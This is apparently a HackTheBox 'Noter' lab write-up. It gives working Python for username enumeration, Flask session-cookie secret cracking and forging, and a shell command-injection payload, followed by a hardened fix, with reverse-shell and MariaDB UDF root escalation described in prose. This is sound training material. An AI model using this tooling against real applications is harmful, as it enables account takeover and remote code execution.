Noter - [HTB]

Marmeus

Introduction

Noter is a medium Linux machine from HackTheBox where the attacker has to recover the secret key of a Flask session cookie (signed with itsdangerous and often mistaken for a JWT) and perform user enumeration to obtain FTP credentials. Then, after discovering the application's password policy, access to a second FTP account is gained, which holds the web application's source code. Analysing that source code reveals a vulnerable function that allows RCE. Finally, because the MariaDB service runs as root, a library can be loaded into it to execute system commands as root.

Enumeration

As always, let's start by finding all open ports on the machine with Nmap.

Then, we continue with a deeper scan of every open port to get more information about each service.

On port 5000 there is an HTTP server hosting a note-taking web application.

Noter

Once registered and logged in to the application, an unusual session cookie is set, as seen in the screenshot. It has the three dot-separated base64url segments of a JWT, but it is actually Flask's signed session cookie (payload, timestamp and HMAC signature).

JWT Token

Exploitation 1

Searching for "Werkzeug JWT cookies" turns up posts about Flask session cookies. Searching then for how to crack a Flask session cookie leads to this post, which explains how to recover the Flask secret key with flask-unsign.

Once the key is obtained, the cookie can be re-signed with the username changed to "Administrator".

However, this user cannot be used to log in to the web application.

Unauthorized administrator user

Nonetheless, it is possible to enumerate registered users, because the login form answers differently depending on whether the account exists: a non-existent account returns "Invalid credentials", whereas an existing account with a wrong password returns "Invalid login".

Enumerating usernames that trigger the "Invalid login" message, the user blue is found.
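The enumeration oracle described above, as an added example that is not part of the original write-up: the two error strings are taken from the text, while the endpoint path, form field names and the offline stand-in for the login form are assumptions.

```python
import urllib.error
import urllib.parse
import urllib.request

INVALID_CREDENTIALS = "Invalid credentials"  # account does not exist
INVALID_LOGIN = "Invalid login"              # account exists, wrong password


def classify(body: str) -> str:
    """Map a login response body to 'exists', 'unknown' or 'unclear'."""
    if INVALID_LOGIN in body:
        return "exists"
    if INVALID_CREDENTIALS in body:
        return "unknown"
    return "unclear"  # a successful login, a rate-limit page, anything unexpected


def enumerate_users(candidates, login):
    """login(username) -> response body. Returns the candidates that exist."""
    return [user for user in candidates if classify(login(user)) == "exists"]


def http_login(base_url: str, username: str, password: str = "x") -> str:
    """Real poster for the oracle. Assumed: POST /login with 'username' and
    'password' form fields; an HTTP error page is still returned as a body."""
    data = urllib.parse.urlencode({"username": username, "password": password}).encode()
    req = urllib.request.Request(f"{base_url}/login", data=data)
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.read().decode(errors="replace")
    except urllib.error.HTTPError as err:
        return err.read().decode(errors="replace")


# Constructed stand-in for the Noter login form, so the example runs offline.
_FAKE_USERS = {"blue", "marmeus"}


def fake_login(username: str) -> str:
    msg = INVALID_LOGIN if username in _FAKE_USERS else INVALID_CREDENTIALS
    return f"<div class='alert'>{msg}</div>"


if __name__ == "__main__":
    print(enumerate_users(["admin", "blue", "root", "marmeus"], fake_login))
```

Against the real target, pass `lambda u: http_login("http://10.10.11.160:5000", u)` (host assumed) in place of `fake_login`; the classifier is the same. Keeping "unclear" as a third class matters in practice, because a single wordlist entry that happens to log in or trip a rate limit would otherwise be silently misreported.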

Now, re-signing the Flask session cookie with the username set to blue, it is possible to access the application as blue.
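The two cookie steps above (recovering the secret with a wordlist, then re-signing the cookie as Administrator and later as blue) in one place, as an added example written for this page rather than code from the write-up or from flask-unsign. It reproduces the itsdangerous format Flask uses for its session cookie (HMAC-SHA1 over `payload.timestamp`, keyed with HMAC(secret, "cookie-session"), base64url without padding, optional zlib payload marked by a leading dot). The secret, wordlist and session fields below are constructed demo values, not the box's.

```python
import base64
import hashlib
import hmac
import json
import time
import zlib

SALT = b"cookie-session"  # fixed salt Flask passes to itsdangerous


def _b64e(raw: bytes) -> bytes:
    return base64.urlsafe_b64encode(raw).rstrip(b"=")


def _b64d(enc: bytes) -> bytes:
    return base64.urlsafe_b64decode(enc + b"=" * (-len(enc) % 4))


def _derived_key(secret: str) -> bytes:
    # itsdangerous 'hmac' key derivation: the MAC key is HMAC(secret, salt)
    return hmac.new(secret.encode(), SALT, hashlib.sha1).digest()


def _signature(value: bytes, secret: str) -> bytes:
    return _b64e(hmac.new(_derived_key(secret), value, hashlib.sha1).digest())


def sign_session(session: dict, secret: str, timestamp=None) -> str:
    """Serialise a session dict the way Flask does and sign it with `secret`."""
    raw = json.dumps(session, separators=(",", ":")).encode()
    compressed = zlib.compress(raw)
    if len(compressed) < len(raw) - 1:      # itsdangerous only compresses when it pays off
        payload = b"." + _b64e(compressed)   # leading dot flags a zlib payload
    else:
        payload = _b64e(raw)
    ts = int(time.time() if timestamp is None else timestamp)
    ts_b64 = _b64e(ts.to_bytes((ts.bit_length() + 7) // 8, "big"))
    value = payload + b"." + ts_b64
    return (value + b"." + _signature(value, secret)).decode()


def verify(cookie: str, secret: str) -> bool:
    value, _, sig = cookie.encode().rpartition(b".")
    return hmac.compare_digest(sig, _signature(value, secret))


def decode_payload(cookie: str) -> dict:
    """Read the session without the secret: the payload is signed, not encrypted."""
    value, _, _ = cookie.encode().rpartition(b".")  # drop signature
    payload, _, _ = value.rpartition(b".")          # drop timestamp
    if payload.startswith(b"."):
        return json.loads(zlib.decompress(_b64d(payload[1:])))
    return json.loads(_b64d(payload))


def crack_secret(cookie: str, wordlist):
    """What `flask-unsign --unsign` does: try candidates until the MAC verifies."""
    for candidate in wordlist:
        if verify(cookie, candidate):
            return candidate
    return None


def forge(cookie: str, secret: str, **changes) -> str:
    """Re-sign the existing session with some fields replaced, e.g. username."""
    session = decode_payload(cookie)
    session.update(changes)
    return sign_session(session, secret)


# Constructed demo data (assumptions, not values from the machine).
WORDLIST = ["password", "admin", "changeme", "letmein"]
COOKIE = sign_session({"logged_in": True, "username": "marmeus"}, "changeme",
                      timestamp=1650000000)

if __name__ == "__main__":
    key = crack_secret(COOKIE, WORDLIST)
    print("secret:", key)
    print("as blue:", forge(COOKIE, key, username="blue"))
```

The same flow with the tool itself is `flask-unsign --unsign --cookie '<cookie>' --wordlist rockyou.txt` followed by `flask-unsign --sign --cookie "{'logged_in': True, 'username': 'blue'}" --secret '<key>'`. Note that `decode_payload` needs no key at all: anything stored in a Flask session is readable by the client, which is why the check "does the payload contain something sensitive?" comes before any cracking attempt.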

The user blue has a note containing some FTP credentials.

Noter Premium membership

Inside the FTP server, there is a policy.pdf file.

Reading the PDF reveals the password creation policy.

So, because the note was written by "ftp_admin", that account's password should, following the policy, be "ftp_admin@Noter!".

Inside the ftp_admin account there are two .zip backup files.

Exploitation 2

Diffing the app.py files from both backups reveals some database credentials and an interesting function that executes a system command.

The function takes a URL, requests it and keeps the text of the response. That text is substituted for {r.text.strip()} in the command template node misc/md-to-pdf.js $'{r.text.strip()}' {rand_int}, which is then executed. So, if the response body is Marmeus, the final command is node misc/md-to-pdf.js $'Marmeus' {rand_int}.

Because the response body is placed unescaped inside a shell command string, a quote followed by a semicolon terminates the $'...' argument and the node command, and whatever comes after the semicolon is executed as a separate command: arbitrary command execution.
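The injection beside a hardened form, as an added example and not the application's real app.py: the command template is the one quoted in the write-up; that it is run through the shell, and that a leading quote is needed to close the $'...' argument, are assumptions. The echo payload is the page's own "echo Marmeus".

```python
import random
import subprocess

# Constructed stand-in for r.text: the body returned by an attacker-controlled URL.
# The leading quote (assumed) closes the $'...' argument so that ';' ends the
# node command; the trailing quote keeps the rest of the line well-formed.
PAYLOAD = "'; echo Marmeus; '"


def build_command_vulnerable(text: str, rand_int: int) -> str:
    """Command string exactly as the write-up describes: text interpolated verbatim."""
    return f"node misc/md-to-pdf.js $'{text.strip()}' {rand_int}"


def run_vulnerable(text: str) -> str:
    """Run the string through the shell (assumed shell=True); return stdout.
    node failing on a bogus argument is irrelevant: the statement after ';'
    still runs, which is the whole point of the injection."""
    cmd = build_command_vulnerable(text, random.randint(1, 10000))
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout


def build_argv_hardened(text: str, rand_int: int) -> list:
    """Hardened form: an argv list for subprocess.run(argv) with no shell.
    The fetched text is one argument, so ';', quotes and $(...) are inert."""
    return ["node", "misc/md-to-pdf.js", text.strip(), str(rand_int)]


if __name__ == "__main__":
    print(build_command_vulnerable(PAYLOAD, 1234))
    print(run_vulnerable(PAYLOAD).strip())
    print(build_argv_hardened(PAYLOAD, 1234))
```

Two caveats on the hardened version. Dropping the shell removes the command injection, but md-to-pdf.js still receives attacker-chosen markdown, so the node script's own handling of that input is the next thing to review. And the fetch itself is a server-side request to a user-supplied URL, so the URL should be restricted (scheme, host, size) independently of how the result is executed.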

To obtain a reverse shell, the following set-up is needed.

Finally, execute the following command.

The result is a reverse shell as the user svc.

Privilege Escalation

Using the database credentials, it is possible to access the web application's database, but it does not contain anything interesting.

However, the MariaDB service runs as root (check the owner of the mysqld process), so it may be possible to turn database access into code execution as root.

On Exploit-DB there is a user-defined function (UDF) library compatible with this version of MariaDB; once the compiled library is loaded into the server, a UDF can run system commands with the privileges of the database process.

Following those steps, you should obtain command execution as root and, with it, the root flag.